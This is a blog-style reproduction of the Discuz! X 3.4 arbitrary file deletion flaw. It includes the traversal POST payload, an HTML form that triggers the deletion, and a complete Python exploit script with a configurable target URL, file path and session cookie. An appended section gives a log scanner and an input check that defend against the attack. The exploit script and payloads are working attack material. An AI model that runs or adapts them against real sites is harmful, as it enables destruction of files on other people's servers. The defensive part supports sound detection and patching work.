Discuz! X 3.4 arbitrary file deletion vulnerability reproduction process (Python script included)


Today the Discuz! X 3.4 arbitrary file deletion vulnerability came up in the group, so I ran some tests myself and recorded the process. At the end I attach my own Python script, which automates the file deletion.

For details of the vulnerability, see https://paper.seebug.org/411/

0X01 Environment Setup

Download the Discuz 3.4 release from the official website, set it up locally with phpStudy, and register an account. In the site root create a new file 111.txt as the target file to be deleted.

Discuz 3.4 Download Link: http://www.discuz.net/thread-3825961-1-1.html

0X02 Reproduction Steps

1. After logging in to the account, click Settings to go to the profile page, then view the page source to get the formhash value.

2. Submit a request that changes the place of birth (birthprovince) to the traversal path:

http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base

[POST] birthprovince=../../../111.txt&profilesubmit=1&formhash=9945c60c

3. Construct the following form; submitting it sends the request that deletes the file.

<form action="http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
    <input type="file" name="birthprovince" id="file" />
    <input type="text" name="formhash" value="9945c60c" />
    <input type="text" name="profilesubmit" value="1" />
    <input type="submit" value="Submit" />
</form>

0X03 Python Script

Following the steps above, I wrote a Python script to replace the manual operation; it succeeded in my local test. I haven't written a script for a while, so the code is a bit crude, but it does the job.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import urllib2

"""
discuz! X<=3.4 arbitrary file removal vulnerability
write by Aaron
"""


def get_cookie():
    # Turn the raw Cookie header string (set in __main__) into a dict for requests
    cookies = {}
    for line in raw_cookies.split(';'):
        key, value = line.strip().split('=', 1)
        cookies[key] = value
    return cookies


def get_formhash(url):
    # Fetch the spacecp page and read the formhash token out of the hidden input
    cookies = get_cookie()
    testurl = url + "/home.php?mod=spacecp"
    s = requests.get(testurl, cookies=cookies)
    com = re.compile(r'<input type="hidden" name="formhash" value="(.*?)" ?/>')
    result = com.findall(s.text)
    return result[0]


def del_step1(url, filename):
    # Step 1: save the traversal path as the "birthprovince" profile field
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    geturl = url + "/home.php?mod=spacecp&ac=profile&op=base"
    formhash = get_formhash(url)
    payload = {'birthprovince': filename, "profilesubmit": 1, "formhash": formhash}
    cookies = get_cookie()
    r = requests.post(geturl, data=payload, headers=headers, cookies=cookies)
    if r.content.find('parent.show_success') > 0:
        print 'STEP1 Success!!!'


def del_step2(url):
    # Step 2: submit the multipart form with deletefile[birthprovince] in the query string
    geturl = url + "/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
    heads = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    formhash = get_formhash(url)
    # 1.jpg must exist in the current directory; any small image file will do
    files = {'formhash': (None, formhash),
             'birthprovince': ('1.jpg', open('1.jpg', 'rb'), 'image/jpeg'),
             'profilesubmit': (None, '1')}
    cookies = get_cookie()
    r = requests.post(geturl, files=files, headers=heads, cookies=cookies)
    if r.text.find('parent.show_success') > 0:
        print 'STEP2 Success!!!'


if __name__ == '__main__':
    # The following three parameters need to be modified:
    # 1. set cookie (the Cookie header of a logged-in session)
    raw_cookies = "G2pl_2132_sid=skkqzk; G2pl_2132_saltkey=sz3zk9qk; g2pl_2132_lastvisit=1506772875; G2PL_2132_LASTACT=1506779386%09HOME.PHP%09SPACECP; G2PL_2132_SECCODE=7.AA0407E77FA5C31C1B; G2pl_2132__refer=%252fhome.php%253fmod%253dspacecp%2526ac%253dprofile%2526op%253dbase; g2pl_2132_ulastactivity=d085jjijs5hig3obxlejquw0znypin60oxjv0j6di%2b8afmkq4u6l; G2PL_2132_AUTH=86C5F09HGUAZUGNPSX7PR7OY4MQ2B39NSVIV%2FRFC8VDN1ZJB9PIBVU2FN4JJR9HR7YVNF2VH9RIXRSLWHMZK; g2pl_2132_nofavfid=1; g2pl_2132_sendmail=1; G2pl_2132_noticetitle=1"
    # 2. set the file to delete
    filename = "../../../111.txt"
    # 3. set URL
    url = "http://127.0.0.1"
    del_step1(url, filename)
    del_step2(url)
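As an added example written for this page (not the author's script and not Discuz code), here is a Python 3 detection and mitigation sketch for the behaviour reproduced above: it scans constructed access-log lines for the request shape of step 3 and shows the server-side value check that would have rejected the step 2 payload. The log format and the set of text-only profile fields are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post): a normal
# profile save, a request shaped like step 3 of the walkthrough, and a page view.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Oct/2017:10:00:01 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1" 200 512
127.0.0.1 - - [01/Oct/2017:10:00:09 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bbirthprovince%5D=aaaaaa HTTP/1.1" 200 498
127.0.0.1 - - [01/Oct/2017:10:00:15 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 8841
"""

# Plain-text profile fields (assumption; extend as needed). A deletefile[...] key
# naming one of them has no legitimate purpose, so it is treated as an abuse attempt.
TEXT_FIELDS = {'birthprovince'}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_deletefile_abuse(target):
    """True for a spacecp profile request whose query string asks to delete
    a text field: the request shape of the final step of the walkthrough."""
    parts = urlsplit(target)
    if parts.path != '/home.php':
        return False
    qs = parse_qs(parts.query)  # percent-decodes deletefile%5B...%5D for us
    if qs.get('mod') != ['spacecp'] or qs.get('ac') != ['profile']:
        return False
    for key in qs:
        m = re.fullmatch(r'deletefile\[(\w+)\]', key)
        if m and m.group(1) in TEXT_FIELDS:
            return True
    return False


def scan_access_log(text):
    """Return (line number, request target) for every request worth alerting on."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and is_deletefile_abuse(m.group('target')):
            hits.append((n, m.group('target')))
    return hits


def is_safe_profile_value(value):
    """Server-side check for a text field such as birthprovince before it is
    stored: reject anything that could later be interpreted as a filesystem path."""
    return not re.search(r'\.\.|[/\\\x00]', value)
```

The POST body of step 2 never appears in an access log, so the scanner keys on the deletefile[...] query string of step 3; the value check is what stops the chain at step 2.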
